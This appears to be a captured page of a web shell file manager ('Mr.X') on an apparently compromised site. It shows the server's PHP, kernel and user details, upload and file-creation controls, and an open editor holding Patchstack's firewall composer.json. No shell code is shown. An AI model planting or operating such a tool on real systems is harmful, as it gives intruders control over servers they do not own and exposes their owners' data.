🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:composer.json
{ "name": "patchstack/firewall", "description": "The firewall engine of Patchstack.", "type": "library", "require": { "php": ">=5.6" }, "license": "GPL-3.0-or-later", "autoload": { "psr-4": { "Patchstack\\": "src/" } }, "authors": [ { "name": "Patchstack", "email": "support@patchstack.com" } ], "require-dev": { "phpunit/phpunit": "^9.5" } }
Save Changes
Cancel
Create New File
Create New Folder